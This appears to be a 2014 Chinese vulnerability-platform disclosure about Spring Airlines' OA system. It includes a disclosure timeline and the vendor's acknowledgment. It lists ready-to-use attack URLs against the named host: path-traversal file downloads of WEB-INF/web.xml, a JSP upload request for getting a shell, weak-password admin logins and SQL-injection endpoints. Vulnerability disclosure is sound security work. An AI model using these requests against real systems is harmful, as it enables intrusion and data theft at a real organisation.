漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2014-06-22: 细节已通知厂商并且等待厂商处理中
2014-06-23: 厂商已经确认,细节仅向厂商公开
2014-07-03: 细节向核心白帽子及相关领域专家公开
2014-07-13: 细节向普通白帽子公开
2014-07-23: 细节向实习白帽子公开
2014-08-06: 细节向公众公开
简要描述:
春秋航空重要系统多处高危漏洞可getshell
详细说明:
1、任意文件下载
http://oa.china-sss.com/defaultroot/download_old.jsp?path=..&name=x&FileName=WEB-INF/web.xml
http://oa.china-sss.com/defaultroot/netdisk/download_netdisk.jsp?path=1&fileName=../../WEB-INF/web&fileExtName=xml&fileSaveName=x
http://oa.china-sss.com/defaultroot/information_manager/informationmanager_download.jsp?path=..&FileName=WEB-INF/web.xml&name=x
http://oa.china-sss.com/defaultroot/download_netdisk.jsp?path=1&fileName=../../WEB-INF/web&fileExtName=xml&fileSaveName=x
http://oa.china-sss.com/defaultroot/wage_manager/download_wage_excelMode.jsp?fileRealName=x&fileSaveName=../../WEB-INF/web.xml
2、任意文件上传
http://oa.china-sss.com/defaultroot/dossier/dossier_import.jsp
http://oa.china-sss.com/defaultroot/govezoffice/custom_documentmanager/smartUpload.jsp?path=..&mode=add&fileName=hello.jsp&saveName=hello.jsp&tableName=hello.jsp&fileMaxSize=0&fileMaxNum=null&fileType=jsp&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0
3、编辑器弱口令
http://oa.china-sss.com/defaultroot/public/edit/admin/login.jsp
http://oa.china-sss.com/defaultroot/public/edit2/admin/login.jsp (建议删除后台)
4、sql注入
http://oa.china-sss.com/defaultroot/outMailLoginCheck.jsp?userAccount=&outMailRandom=
http://oa.china-sss.com/efaultroot/iWebRevision.jsp/DocumentEdit.jsp(此文件多处存在)
漏洞证明:
修复方案:
好多呀。。。。。
版权声明:转载请注明来源 瘦蛟舞@乌云
>
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-06-23 10:04
厂商回复:
已收到,谢谢。
最新状态:
暂无